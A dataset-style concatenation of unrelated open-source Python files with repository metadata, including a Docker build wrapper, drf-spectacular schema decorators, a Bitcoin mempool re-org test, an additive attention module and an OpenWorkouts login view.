    """Merge every non-default JSON file in *cfg_dirname* over its default.json.

    Each directory's ``default.json`` provides base values; every other JSON
    file shallowly overrides them (``dict.update``) and is stored in
    ``cfg_dict`` under its basename.
    """
    with open(os.path.join(cfg_dirname, default_filename), "r") as f:
        default_cfg = json.load(f)
    for filename in glob.glob(os.path.join(cfg_dirname, "*")):
        basename = os.path.basename(filename)
        # skip the base config itself, and anything that is not a regular
        # file (glob "*" also matches sub-directories)
        if basename == default_filename or not os.path.isfile(filename):
            continue
        with open(filename, "r") as f:
            merged = copy.deepcopy(default_cfg)
            merged.update(json.load(f))
        cfg_dict[basename] = merged


for _cfg_dirname in cfg_dirnames:
    _load_cfg_dir(_cfg_dirname)

if __name__ == "__main__":
    for k, v in cfg_dict.items():
        print(k)
| 29.518519 | 77 | 0.667503 |
5e48ce1049a400e53ff708b11af29471702ac060 | 1,662 | py | Python | container.py | bowmanjd/elm-builder-ia32 | b2433d7a21a57f4b5b5eb162688cd9f573308344 | [
"Apache-2.0"
] | 1 | 2019-01-17T19:21:30.000Z | 2019-01-17T19:21:30.000Z | container.py | bowmanjd/elm-builder | b2433d7a21a57f4b5b5eb162688cd9f573308344 | [
"Apache-2.0"
] | null | null | null | container.py | bowmanjd/elm-builder | b2433d7a21a57f4b5b5eb162688cd9f573308344 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3.7
import subprocess
import sys
import fire
# arch name -> image name prefix used when resolving the base image per arch
arches = {"i386": "i386/", "x86_64": ""}
class Container:
    """Thin wrapper around the docker CLI for multi-arch image builds."""

    def __init__(self, name, repo="bowmanjd"):
        self.docker_exe = ["docker"]
        if sys.platform != "win32":
            # non-Windows hosts invoke docker through sudo
            self.docker_exe.insert(0, "sudo")
        self.location = f"{repo}/{name}"

    def build(self, filename="Dockerfile", base=None, clean=False, push=True):
        """Render the Dockerfile template per arch, build and optionally push."""
        default_base = base is None
        if default_base:
            base = "debian:stable-slim"

        with open(filename) as f:
            tpl = f.read()

        build_cmd = self.docker_exe + ["build"]
        if clean:
            build_cmd.append("--no-cache")

        for arch, prefix in arches.items():
            tags = []
            if default_base:
                tags.append(arch)
                if arch == "i386":
                    tags.append("latest")
            tags.append(f"{arch}-{base.replace(':', '-')}")

            cmd = list(build_cmd)
            for tag in tags:
                cmd.extend(["-t", f"{self.location}:{tag}"])
            cmd.append("-")

            dockerfile = tpl.format(base=prefix + base, arch=arch)
            subprocess.run(cmd, input=dockerfile, encoding="utf-8")

            if push:
                for tag in tags:
                    self.push(f"{self.location}:{tag}")

    def push(self, location):
        """Push a single tag with the configured docker executable."""
        subprocess.run(self.docker_exe + ["push", location])

    def run(self):
        """Run the built image interactively."""
        subprocess.run(self.docker_exe + ["run", "-it", self.location])
if __name__ == "__main__":
    # expose the Container class as a command-line interface via python-fire
    fire.Fire(Container)
| 29.157895 | 78 | 0.518051 |
46b76fe1b2bceb0626ba35e4b3e437b0b50ae1f1 | 19,712 | py | Python | drf_spectacular/utils.py | credativ/drf-spectacular | 2684fdae7c2c02d289fe8856d7f35a6d634b4a09 | [
"BSD-3-Clause"
] | null | null | null | drf_spectacular/utils.py | credativ/drf-spectacular | 2684fdae7c2c02d289fe8856d7f35a6d634b4a09 | [
"BSD-3-Clause"
] | null | null | null | drf_spectacular/utils.py | credativ/drf-spectacular | 2684fdae7c2c02d289fe8856d7f35a6d634b4a09 | [
"BSD-3-Clause"
] | null | null | null | import functools
import inspect
from typing import Any, Dict, List, Optional, Type, Union
from rest_framework.fields import Field, empty
from rest_framework.serializers import Serializer
from rest_framework.settings import api_settings
from drf_spectacular.drainage import error, get_view_methods, set_override, warn
from drf_spectacular.types import OpenApiTypes
_SerializerType = Union[Serializer, Type[Serializer]]
_SerializerTypeVariations = Union[OpenApiTypes, _SerializerType]
class PolymorphicProxySerializer(Serializer):
    """
    This class is to be used with :func:`@extend_schema <.extend_schema>` to
    signal a request/response might be polymorphic (accepts/returns data
    possibly from different serializers). Usage usually looks like this:

    .. code-block::

        @extend_schema(
            request=PolymorphicProxySerializer(
                component_name='MetaPerson',
                serializers=[
                    LegalPersonSerializer, NaturalPersonSerializer,
                ],
                resource_type_field_name='person_type',
            )
        )
        def create(self, request, *args, **kwargs):
            return Response(...)

    **Beware** that this is not a real serializer and it will raise an AssertionError
    if used in that way. It **cannot** be used in views as `serializer_class`
    or as field in an actual serializer. It is solely meant for annotation purposes.

    Also make sure that each sub-serializer has a field named after the value of
    ``resource_type_field_name`` (discriminator field). Generated clients will likely
    depend on the existence of this field. Setting ``resource_type_field_name``
    to ``None`` will remove the discriminator altogether. This may be useful in
    certain situations, but will most likely break client generation.

    It is **strongly** recommended to pass the ``Serializers`` as **list**,
    and by that let *drf-spectacular* retrieve the field and handle the mapping
    automatically. In special circumstances, the field may not available when
    drf-spectacular processes the serializer. In those cases you can explicitly state
    the mapping with ``{'legal': LegalPersonSerializer, ...}``, but it is then your
    responsibility to have a valid mapping.
    """
    def __init__(
        self,
        component_name: str,
        serializers: Union[List[_SerializerType], Dict[str, _SerializerType]],
        resource_type_field_name: Optional[str],
        many: bool = False,
    ):
        self.component_name = component_name
        self.serializers = serializers
        self.resource_type_field_name = resource_type_field_name
        super().__init__(many=many)

    @property
    def data(self):
        # fail loudly instead of returning serialized data: this proxy must
        # never be used as an actual serializer at runtime
        self._trap()

    def to_internal_value(self, data):
        self._trap()

    def to_representation(self, instance):
        self._trap()

    def _trap(self):
        # single choke point for all runtime (mis)use of this annotation helper
        raise AssertionError(
            "PolymorphicProxySerializer is an annotation helper and not supposed to "
            "be used for real requests. See documentation for correct usage."
        )
class OpenApiSchemaBase:
    """Common marker base class for the OpenApi* annotation helper classes."""
    pass
class OpenApiExample(OpenApiSchemaBase):
    """
    Helper class to document a API parameter / request body / response body
    with a concrete example value.

    The example will be attached to the operation object where appropriate,
    i. e. where the given ``media_type``, ``status_code`` and modifiers match.
    Example that do not match any scenario are ignored.
    """
    def __init__(
        self,
        name: str,
        value: Any = None,
        external_value: str = '',
        summary: str = '',
        description: str = '',
        request_only: bool = False,
        response_only: bool = False,
        media_type: str = 'application/json',
        status_codes: Optional[List[str]] = None
    ):
        self.name = name
        self.summary = summary
        self.description = description
        self.value = value
        self.external_value = external_value
        self.request_only = request_only
        self.response_only = response_only
        self.media_type = media_type
        # default to the common success codes when none are given explicitly
        self.status_codes = status_codes or ['200', '201']
class OpenApiParameter(OpenApiSchemaBase):
    """
    Helper class to document request query/path/header/cookie parameters.
    Can also be used to document response headers.

    Please note that not all arguments apply to all ``location``/``type``/direction
    variations, e.g. path parameters are ``required=True`` by definition.

    For valid ``style`` choices please consult the
    `OpenAPI specification <https://swagger.io/specification/#style-values>`_.
    """
    # valid values for the ``location`` argument (OpenAPI "in" keyword)
    QUERY = 'query'
    PATH = 'path'
    HEADER = 'header'
    COOKIE = 'cookie'

    def __init__(
        self,
        name: str,
        type: Any = str,
        location: str = QUERY,
        required: bool = False,
        description: str = '',
        enum: Optional[List[Any]] = None,
        deprecated: bool = False,
        style: Optional[str] = None,
        explode: Optional[bool] = None,
        default: Any = None,
        examples: Optional[List[OpenApiExample]] = None,
        exclude: bool = False,
        response: Union[bool, List[Union[int, str]]] = False,
    ):
        self.name = name
        self.type = type
        self.location = location
        self.required = required
        self.description = description
        self.enum = enum
        self.deprecated = deprecated
        self.style = style
        self.explode = explode
        self.default = default
        # normalize None to a fresh list (avoids a shared mutable default)
        self.examples = examples or []
        self.exclude = exclude
        # marks the parameter as a response header (see class docstring); a
        # list presumably restricts it to those status codes — TODO confirm
        self.response = response
class OpenApiResponse(OpenApiSchemaBase):
    """
    Helper class to bundle a response object (``Serializer``, ``OpenApiType``,
    raw schema, etc) together with a response object description and/or examples.
    Examples can alternatively be provided via :func:`@extend_schema <.extend_schema>`.

    This class is especially helpful for explicitly describing status codes on a
    "Response Object" level.
    """
    def __init__(
        self,
        response: Any = None,
        description: Optional[str] = None,
        examples: Optional[List[OpenApiExample]] = None
    ):
        self.response = response
        self.description = description
        # normalize None to a fresh list (avoids a shared mutable default)
        self.examples = examples or []
def extend_schema(
    operation_id: Optional[str] = None,
    parameters: Optional[List[OpenApiParameter]] = None,
    request: Any = empty,
    responses: Any = empty,
    auth: Optional[List[str]] = None,
    description: Optional[str] = None,
    summary: Optional[str] = None,
    deprecated: Optional[bool] = None,
    tags: Optional[List[str]] = None,
    exclude: bool = False,
    operation: Optional[Dict] = None,
    methods: Optional[List[str]] = None,
    versions: Optional[List[str]] = None,
    examples: Optional[List[OpenApiExample]] = None,
):
    """
    Decorator mainly for the "view" method kind. Partially or completely overrides
    what would be otherwise generated by drf-spectacular.

    :param operation_id: replaces the auto-generated operation_id. make sure there
        are no naming collisions.
    :param parameters: list of additional or replacement parameters added to the
        auto-discovered fields.
    :param responses: replaces the discovered Serializer. Takes a variety of
        inputs that can be used individually or combined

        - ``Serializer`` class
        - ``Serializer`` instance (e.g. ``Serializer(many=True)`` for listings)
        - ``dict`` with status codes as keys and `Serializers` as values.
        - ``dict`` with tuple (status_code, media_type) as keys and `Serializers` as values.
        - basic types or instances of ``OpenApiTypes``
        - :class:`.OpenApiResponse` for bundling any of the other choices together with
          either a dedicated response description and/or examples.
        - :class:`.PolymorphicProxySerializer` for signaling that
          the operation may yield data from different serializers depending
          on the circumstances.
    :param request: replaces the discovered ``Serializer``. Takes a variety of inputs

        - ``Serializer`` class/instance
        - basic types or instances of ``OpenApiTypes``
        - :class:`.PolymorphicProxySerializer` for signaling that the operation
          accepts a set of different types of objects.
        - ``dict`` with media_type as keys and one of the above as values.
    :param auth: replace discovered auth with explicit list of auth methods
    :param description: replaces discovered doc strings
    :param summary: an optional short summary of the description
    :param deprecated: mark operation as deprecated
    :param tags: override default list of tags
    :param exclude: set True to exclude operation from schema
    :param operation: manually override what auto-discovery would generate. you must
        provide a OpenAPI3-compliant dictionary that gets directly translated to YAML.
    :param methods: scope extend_schema to specific methods. matches all by default.
    :param versions: scope extend_schema to specific API version. matches all by default.
    :param examples: attach request/response examples to the operation
    :return:
    """
    def decorator(f):
        # resolve the most specific schema class already attached to the target
        BaseSchema = (
            # explicit manually set schema or previous view annotation
            getattr(f, 'schema', None)
            # previously set schema with @extend_schema on views methods
            or getattr(f, 'kwargs', {}).get('schema', None)
            # previously set schema with @extend_schema on @api_view
            or getattr(getattr(f, 'cls', None), 'kwargs', {}).get('schema', None)
            # the default
            or api_settings.DEFAULT_SCHEMA_CLASS
        )
        if not inspect.isclass(BaseSchema):
            BaseSchema = BaseSchema.__class__

        def is_in_scope(ext_schema):
            # True when the request's API version and HTTP method fall inside
            # the decorator's (optional) ``versions``/``methods`` scope
            version, _ = ext_schema.view.determine_version(
                ext_schema.view.request,
                **ext_schema.view.kwargs
            )
            version_scope = versions is None or version in versions
            method_scope = methods is None or ext_schema.method in methods
            return method_scope and version_scope

        # overlays the decorator arguments onto the discovered schema class;
        # every override only applies when is_in_scope() holds
        class ExtendedSchema(BaseSchema):
            def get_operation(self, path, path_regex, path_prefix, method, registry):
                self.method = method

                if exclude and is_in_scope(self):
                    return None
                if operation is not None and is_in_scope(self):
                    return operation
                return super().get_operation(path, path_regex, path_prefix, method, registry)

            def get_operation_id(self):
                if operation_id and is_in_scope(self):
                    return operation_id
                return super().get_operation_id()

            def get_override_parameters(self):
                if parameters and is_in_scope(self):
                    return super().get_override_parameters() + parameters
                return super().get_override_parameters()

            def get_auth(self):
                if auth and is_in_scope(self):
                    return auth
                return super().get_auth()

            def get_examples(self):
                if examples and is_in_scope(self):
                    return examples
                return super().get_examples()

            def get_request_serializer(self):
                if request is not empty and is_in_scope(self):
                    return request
                return super().get_request_serializer()

            def get_response_serializers(self):
                if responses is not empty and is_in_scope(self):
                    return responses
                return super().get_response_serializers()

            def get_description(self):
                if description and is_in_scope(self):
                    return description
                return super().get_description()

            def get_summary(self):
                if summary and is_in_scope(self):
                    return str(summary)
                return super().get_summary()

            def is_deprecated(self):
                if deprecated and is_in_scope(self):
                    return deprecated
                return super().is_deprecated()

            def get_tags(self):
                if tags is not None and is_in_scope(self):
                    return tags
                return super().get_tags()

        if inspect.isclass(f):
            # either direct decoration of views, or unpacked @api_view from OpenApiViewExtension
            if operation_id is not None or operation is not None:
                error(
                    f'using @extend_schema on viewset class {f.__name__} with parameters '
                    f'operation_id or operation will most likely result in a broken schema.'
                )
            # reorder schema class MRO so that view method annotation takes precedence
            # over view class annotation. only relevant if there is a method annotation
            for view_method in get_view_methods(view=f, schema=BaseSchema):
                if 'schema' in getattr(view_method, 'kwargs', {}):
                    view_method.kwargs['schema'] = type(
                        'ExtendedMetaSchema', (view_method.kwargs['schema'], ExtendedSchema), {}
                    )
            # persist schema on class to provide annotation to derived view methods.
            # the second purpose is to serve as base for view multi-annotation
            f.schema = ExtendedSchema()
            return f
        elif callable(f) and hasattr(f, 'cls'):
            # 'cls' attr signals that as_view() was called, which only applies to @api_view.
            # keep a "unused" schema reference at root level for multi annotation convenience.
            setattr(f.cls, 'kwargs', {'schema': ExtendedSchema})
            # set schema on method kwargs context to emulate regular view behaviour.
            for method in f.cls.http_method_names:
                setattr(getattr(f.cls, method), 'kwargs', {'schema': ExtendedSchema})
            return f
        elif callable(f):
            # custom actions have kwargs in their context, others don't. create it so our create_view
            # implementation can overwrite the default schema
            if not hasattr(f, 'kwargs'):
                f.kwargs = {}
            # this simulates what @action is actually doing. somewhere along the line in this process
            # the schema is picked up from kwargs and used. it's involved my dear friends.
            # use class instead of instance due to descriptor weakref reverse collisions
            f.kwargs['schema'] = ExtendedSchema
            return f
        else:
            return f

    return decorator
def extend_schema_field(
        field: Union[_SerializerTypeVariations, Dict],
        component_name: Optional[str] = None
):
    """
    Decorator for the "field" kind. Usable with ``SerializerMethodField``
    (decorate the actual method) or with custom ``serializers.Field``
    implementations. No decoration is needed when the custom field's base
    class already is the desired type; decorating a custom field class
    overrides the discovered base class type. This mechanism always takes
    precedence over other ones (e.g. type hints, auto-discovery).

    :param field: accepts a ``Serializer``, :class:`~.types.OpenApiTypes` or raw ``dict``
    :param component_name: signals that the field should be broken out as separate component
    """
    def annotate(obj):
        # stash both overrides on the decorated method/class for later
        # pickup by the schema generator
        set_override(obj, 'field', field)
        set_override(obj, 'field_component_name', component_name)
        return obj

    return annotate
def extend_schema_serializer(
        many: Optional[bool] = None,
        exclude_fields: Optional[List[str]] = None,
        examples: Optional[List[OpenApiExample]] = None,
):
    """
    Decorator for the "serializer" kind. Intended for overriding default
    serializer behaviour that cannot be influenced through
    :func:`@extend_schema <.extend_schema>`.

    :param many: override how the serializer is initialized. Mainly used to
        coerce the list view detection heuristic to acknowledge a non-list
        serializer.
    :param exclude_fields: fields to ignore while processing the serializer.
        Only affects the schema; the fields are still exposed through the API.
    :param examples: define example data for the serializer.
    """
    def annotate(serializer_class):
        # ``many`` is a tri-state flag, so ``False`` must still be recorded
        if many is not None:
            set_override(serializer_class, 'many', many)
        # the remaining overrides are only recorded when non-empty
        for key, value in (('exclude_fields', exclude_fields),
                           ('examples', examples)):
            if value:
                set_override(serializer_class, key, value)
        return serializer_class

    return annotate
def extend_schema_view(**kwargs):
    """
    Convenience decorator for the "view" kind. Intended for annotating
    derived view methods that are not directly present in the view (usually
    methods like ``list`` or ``retrieve``). Spares you from overriding
    methods like ``list``, only to perform a super call in the body so that
    you have something to attach :func:`@extend_schema <.extend_schema>` to.

    This decorator also takes care of safely attaching annotations to
    derived view methods, preventing leakage into unrelated views.

    :param kwargs: method names as argument names and
        :func:`@extend_schema <.extend_schema>` calls as values
    """
    def isolate(method_decorator, method):
        # wrap the inherited method so the annotation lands on a fresh
        # function object instead of mutating the base class' method
        @method_decorator
        @functools.wraps(method)
        def wrapped_method(self, request, *args, **kw):
            return method(self, request, *args, **kw)

        return wrapped_method

    def annotate(view):
        available = {m.__name__: m for m in get_view_methods(view)}
        for method_name, method_decorator in kwargs.items():
            if method_name not in available:
                warn(
                    f'@extend_schema_view argument "{method_name}" was not found on view '
                    f'{view.__name__}. method override for "{method_name}" will be ignored.'
                )
                continue
            method = available[method_name]
            if method_name in view.__dict__:
                # the method belongs to this view: safe to decorate in place
                method_decorator(method)
            else:
                # derived method: decorate a wrapper so the other class'
                # context stays untouched
                setattr(view, method_name, isolate(method_decorator, method))
        return view

    return annotate
def inline_serializer(name: str, fields: Dict[str, Field], **kwargs) -> Serializer:
    """
    Build a one-off ``Serializer`` subclass on the fly and return an
    instance of it. Primarily useful with
    :func:`@extend_schema <.extend_schema>`, where an implicit serializer
    is needed that is not reflected in an actual class.

    :param name: name given to the generated serializer class
    :param fields: dict with field names as keys and serializer fields as values
    :param kwargs: optional kwargs for serializer initialization
    """
    # dynamically create the class, then instantiate it
    klass = type(name, (Serializer,), fields)
    return klass(**kwargs)
| 41.324948 | 104 | 0.641487 |
6f7f577e36cfe50f1e1ed461f6f8a2fc4f900f51 | 3,451 | py | Python | qa/rpc-tests/mempool_resurrect_test.py | whiteangelsblack/bitcoinstx | ed75f5c9116c2a91e947998e0b5ffb84c76fa449 | [
"MIT"
] | null | null | null | qa/rpc-tests/mempool_resurrect_test.py | whiteangelsblack/bitcoinstx | ed75f5c9116c2a91e947998e0b5ffb84c76fa449 | [
"MIT"
] | null | null | null | qa/rpc-tests/mempool_resurrect_test.py | whiteangelsblack/bitcoinstx | ed75f5c9116c2a91e947998e0b5ffb84c76fa449 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework import BitcoinTestFramework
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
import os
import shutil
# Create one-input, one-output, no-fee transaction:
class MempoolCoinbaseTest(BitcoinTestFramework):
    """Check that transactions confirmed in disconnected blocks are
    resurrected into the mempool and confirmed again after a re-org."""

    def setup_network(self):
        """Start a single node with mempool checking/debugging enabled."""
        # Just need one node for this test
        args = ["-checkmempool", "-debug=mempool"]
        self.nodes = []
        self.nodes.append(start_node(0, self.options.tmpdir, args))
        self.is_network_split = False

    def create_tx(self, from_txid, to_address, amount):
        """Build and sign a one-input (vout 0), one-output transaction;
        return the signed raw transaction hex."""
        inputs = [{ "txid" : from_txid, "vout" : 0}]
        outputs = { to_address : amount }
        rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
        signresult = self.nodes[0].signrawtransaction(rawtx)
        assert_equal(signresult["complete"], True)
        return signresult["hex"]

    def run_test(self):
        """Mine spends, invalidate the blocks, and verify the spends come
        back to the mempool and then get mined again."""
        node0_address = self.nodes[0].getnewaddress()
        # Spend block 1/2/3's coinbase transactions
        # Mine a block.
        # Create three more transactions, spending the spends
        # Mine another block.
        # ... make sure all the transactions are confirmed
        # Invalidate both blocks
        # ... make sure all the transactions are put back in the mempool
        # Mine a new block
        # ... make sure all the transactions are confirmed again.
        b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
        coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
        spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
        spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
        blocks = []
        blocks.extend(self.nodes[0].generate(1))
        spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
        spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
        blocks.extend(self.nodes[0].generate(1))
        # mempool should be empty, all txns confirmed
        assert_equal(set(self.nodes[0].getrawmempool()), set())
        for txid in spends1_id+spends2_id:
            tx = self.nodes[0].gettransaction(txid)
            assert(tx["confirmations"] > 0)
        # Use invalidateblock to re-org back; all transactions should
        # end up unconfirmed and back in the mempool
        for node in self.nodes:
            node.invalidateblock(blocks[0])
        # mempool should now contain both spend batches, all unconfirmed
        assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
        for txid in spends1_id+spends2_id:
            tx = self.nodes[0].gettransaction(txid)
            assert(tx["confirmations"] == 0)
        # Generate another block, they should all get mined
        self.nodes[0].generate(1)
        # mempool should be empty, all txns confirmed
        assert_equal(set(self.nodes[0].getrawmempool()), set())
        for txid in spends1_id+spends2_id:
            tx = self.nodes[0].gettransaction(txid)
            assert(tx["confirmations"] > 0)
# allow running this regression test directly from the command line
if __name__ == '__main__':
    MempoolCoinbaseTest().main()
| 38.775281 | 92 | 0.65836 |
1558cbc7b25234558b0f37ad81f3ab4110589317 | 2,357 | py | Python | allennlp/modules/attention/additive_attention.py | sun-xiaoyu/allennlp | b49aff6aac4e9912564ee8235250d50c9d17e53f | [
"Apache-2.0"
] | 4 | 2019-05-30T01:03:31.000Z | 2021-12-18T08:24:51.000Z | allennlp/modules/attention/additive_attention.py | sun-xiaoyu/allennlp | b49aff6aac4e9912564ee8235250d50c9d17e53f | [
"Apache-2.0"
] | 123 | 2020-04-26T02:41:30.000Z | 2021-08-02T21:18:00.000Z | allennlp/modules/attention/additive_attention.py | sun-xiaoyu/allennlp | b49aff6aac4e9912564ee8235250d50c9d17e53f | [
"Apache-2.0"
] | 5 | 2019-07-16T06:43:50.000Z | 2021-12-18T08:25:12.000Z | from overrides import overrides
import torch
from torch.nn.parameter import Parameter
from allennlp.modules.attention.attention import Attention
@Attention.register("additive")
class AdditiveAttention(Attention):
    """
    Computes attention between a vector ``x`` and a matrix ``y`` using the
    additive attention function ``V tanh(Wx + Uy)``, where ``W`` and ``U``
    are learned matrices and ``V`` is a learned vector. Often called concat
    or additive attention; introduced by Bahdanau et al. in
    <https://arxiv.org/abs/1409.0473>.

    Registered as an `Attention` with name "additive".

    # Parameters

    vector_dim : `int`, required
        The dimension of the vector, `x`, described above (``x.size()[-1]``).
        Needed to size the weight matrices correctly.
    matrix_dim : `int`, required
        The dimension of the matrix, `y`, described above (``y.size()[-1]``).
        Needed to size the weight matrices correctly.
    normalize : `bool`, optional (default : `True`)
        If true, the computed similarities are normalized with a softmax to
        return a probability distribution for the attention. If false, raw
        similarity scores are returned.
    """

    def __init__(self, vector_dim: int, matrix_dim: int, normalize: bool = True) -> None:
        super().__init__(normalize)
        self._w_matrix = Parameter(torch.Tensor(vector_dim, vector_dim))
        self._u_matrix = Parameter(torch.Tensor(matrix_dim, vector_dim))
        self._v_vector = Parameter(torch.Tensor(vector_dim, 1))
        self.reset_parameters()

    def reset_parameters(self):
        # Xavier/Glorot-uniform initialization for all three weights
        for weight in (self._w_matrix, self._u_matrix, self._v_vector):
            torch.nn.init.xavier_uniform_(weight)

    @overrides
    def _forward_internal(self, vector: torch.Tensor, matrix: torch.Tensor) -> torch.Tensor:
        # Wx (broadcast over the matrix rows) + Uy, then tanh and project
        # down to a scalar score per row with V.
        projected = vector.matmul(self._w_matrix).unsqueeze(1)
        projected = projected + matrix.matmul(self._u_matrix)
        scores = torch.tanh(projected).matmul(self._v_vector)
        return scores.squeeze(2)
| 45.326923 | 97 | 0.705558 |
8cc69d55fb5c5dae6d1fd12ec9569bab7e59fdb7 | 376 | py | Python | deploy/nsis.py | roman-st/DeployTool | af6bda37ef84f06358c875f4d07609287432c4f3 | [
"MIT"
] | null | null | null | deploy/nsis.py | roman-st/DeployTool | af6bda37ef84f06358c875f4d07609287432c4f3 | [
"MIT"
] | null | null | null | deploy/nsis.py | roman-st/DeployTool | af6bda37ef84f06358c875f4d07609287432c4f3 | [
"MIT"
] | null | null | null | from install import RemoteInstaller
def install(remoteInstaller, setup, install_path):
    """Silently run an NSIS installer on the remote machine.

    :param remoteInstaller: object exposing ``install(command)``
    :param setup: path of the NSIS setup executable to run
    :param install_path: target directory, passed via the ``/D=`` switch
    :return: whatever ``remoteInstaller.install`` returns
    """
    # /S = silent mode, /D = destination directory (NSIS installer switches)
    command = '{0} /S /D={1}'.format(setup, install_path)
    return remoteInstaller.install(command)
def uninstall(remoteInstaller, uninstaller, install_path):
    """Silently run an NSIS uninstaller on the remote machine.

    :param remoteInstaller: object exposing ``uninstall(command)``
    :param uninstaller: name of the uninstaller executable inside
        ``install_path``
    :param install_path: directory the package was installed into
    :return: whatever ``remoteInstaller.uninstall`` returns
    """
    # /S runs the NSIS uninstaller in silent mode
    uninstall_cmd = '{0}/{1} /S'.format(install_path, uninstaller)
    return remoteInstaller.uninstall(uninstall_cmd)
3b733cc0b14f1bfc642057dabbe213bc782291f7 | 52 | py | Python | app/purchase/tests/__init__.py | phessabi/eshop | 6a5352753a0c27f9c3f0eda6eec696f49ef4a8eb | [
"Apache-2.0"
] | 1 | 2020-02-04T21:18:31.000Z | 2020-02-04T21:18:31.000Z | app/purchase/tests/__init__.py | phessabi/eshop | 6a5352753a0c27f9c3f0eda6eec696f49ef4a8eb | [
"Apache-2.0"
] | 12 | 2020-01-01T11:46:33.000Z | 2022-03-12T00:10:01.000Z | app/purchase/tests/__init__.py | phessabi/eshop | 6a5352753a0c27f9c3f0eda6eec696f49ef4a8eb | [
"Apache-2.0"
] | 1 | 2020-02-18T11:12:48.000Z | 2020-02-18T11:12:48.000Z | from .api_tests.purchase import PurchaseAPITestCase
| 26 | 51 | 0.884615 |
b13c2ff6119f163151e3a139863c64f3bc4e9f64 | 18,331 | py | Python | ow/views/user.py | openworkouts/OpenWorkouts | ecfed69e8c654c09bb8c074d8aedda9c13cd2235 | [
"BSD-3-Clause"
] | 3 | 2019-02-15T11:38:20.000Z | 2020-10-03T19:03:51.000Z | ow/views/user.py | openworkouts/OpenWorkouts | ecfed69e8c654c09bb8c074d8aedda9c13cd2235 | [
"BSD-3-Clause"
] | null | null | null | ow/views/user.py | openworkouts/OpenWorkouts | ecfed69e8c654c09bb8c074d8aedda9c13cd2235 | [
"BSD-3-Clause"
] | null | null | null | import json
from datetime import datetime, timezone, timedelta
from decimal import Decimal
from io import BytesIO
from pyramid.httpexceptions import HTTPFound, HTTPNotFound
from pyramid.view import view_config
from pyramid.security import remember, forget
from pyramid.response import Response
from pyramid.i18n import TranslationStringFactory, get_localizer
from pyramid_simpleform import Form, State
from pytz import common_timezones
from PIL import Image
from ..models.user import User
from ..schemas.user import (
UserProfileSchema,
ChangePasswordSchema,
SignUpSchema,
)
from ..models.root import OpenWorkouts
from ..views.renderers import OWFormRenderer
from ..utilities import (
timedelta_to_hms,
get_verification_token,
get_gender_names,
get_available_locale_names,
get_month_names,
get_week_day_names
)
from ..mail import send_verification_email
# translation string factory bound to the OpenWorkouts i18n domain
_ = TranslationStringFactory('OpenWorkouts')
# localized month and week-day name mappings, computed once at import time
month_name = get_month_names()
weekday_name = get_week_day_names()
@view_config(context=OpenWorkouts)
def dashboard_redirect(context, request):
    """
    Redirect visitors hitting the root object: authenticated users go to
    their dashboard, stale sessions (whose user no longer exists) are
    logged out, anonymous visitors are sent to the login page.
    """
    uid = request.authenticated_userid
    if not uid:
        return HTTPFound(location=request.resource_url(context, 'login'))
    user = request.root.get_user_by_uid(uid)
    if not user:
        # authenticated session for a user that does not exist anymore,
        # force a logout
        return HTTPFound(location=request.resource_url(context, 'logout'))
    return HTTPFound(location=request.resource_url(user))
@view_config(
    context=OpenWorkouts,
    name='login',
    renderer='ow:templates/login.pt')
def login(context, request):
    """
    Render the login page and authenticate users on POST.

    Handles three failure modes: unknown email, wrong password and an
    account still pending email verification (for which a re-send link is
    offered). On success the user's preferred locale is stored in the
    ``_LOCALE_`` cookie and she is redirected to ``return_to`` or her
    dashboard.
    """
    # messages is a dict of pre-defined messages we would need to show to the
    # user when coming back to the login page after certain actions
    messages = {
        'already-verified': _('User has been verified already'),
        'link-sent': _('Verification link sent, please check your inbox'),
        'max-tokens-sent': _(
            'We already sent you the verification link more than three times')
    }
    message = request.GET.get('message', '')
    if message:
        # map the ``message`` query key to its user-facing text (empty when
        # the key is unknown)
        message = messages.get(message, '')
    email = request.GET.get('email', '')
    password = ''
    return_to = request.params.get('return_to')
    redirect_url = return_to or request.resource_url(request.root)
    # If the user still has to verify the account, this will be set to the
    # proper link to re-send the verification email
    resend_verify_link = None
    if 'submit' in request.POST:
        email = request.POST.get('email', None)
        user = context.get_user_by_email(email)
        if user:
            if user.verified:
                password = request.POST.get('password', None)
                if password is not None and user.check_password(password):
                    # look for the value of locale for this user, to set the
                    # LOCALE cookie, so the UI appears on the pre-selected lang
                    default_locale = request.registry.settings.get(
                        'pyramid.default_locale_name')
                    locale = getattr(user, 'locale', default_locale)
                    request.response.set_cookie('_LOCALE_', locale)
                    # log in the user and send back to the place he wanted to
                    # visit
                    headers = remember(request, str(user.uid))
                    request.response.headers.extend(headers)
                    redirect_url = return_to or request.resource_url(user)
                    return HTTPFound(location=redirect_url,
                                     headers=request.response.headers)
                else:
                    message = _('Wrong password')
            else:
                message = _('You have to verify your account first')
                resend_verify_link = request.resource_url(
                    user, 'resend-verification-link'
                )
        else:
            message = _('Wrong email address')
    return {
        'message': message,
        'email': email,
        'password': password,
        'redirect_url': redirect_url,
        'resend_verify_link': resend_verify_link
    }
@view_config(context=OpenWorkouts, name='logout')
def logout(context, request):
    """
    Close the user session: drop the locale cookie and the authentication
    headers, then send the visitor back to the site root.
    """
    request.response.delete_cookie('_LOCALE_')
    request.response.headers.extend(forget(request))
    return HTTPFound(location=request.resource_url(context),
                     headers=request.response.headers)
@view_config(
    context=OpenWorkouts,
    name='signup',
    renderer='ow:templates/signup.pt')
def signup(context, request):
    """
    Render the sign up form and create new (unverified) user accounts.

    On a valid POST the user is stored, a verification token is generated
    and emailed, and the visitor is redirected to the site root (login).
    """
    # pass the existing emails/nicknames so the schema can reject duplicates
    state = State(emails=context.lowercase_emails,
                  names=context.lowercase_nicknames)
    form = Form(request, schema=SignUpSchema(), state=state)
    if 'submit' in request.POST and form.validate():
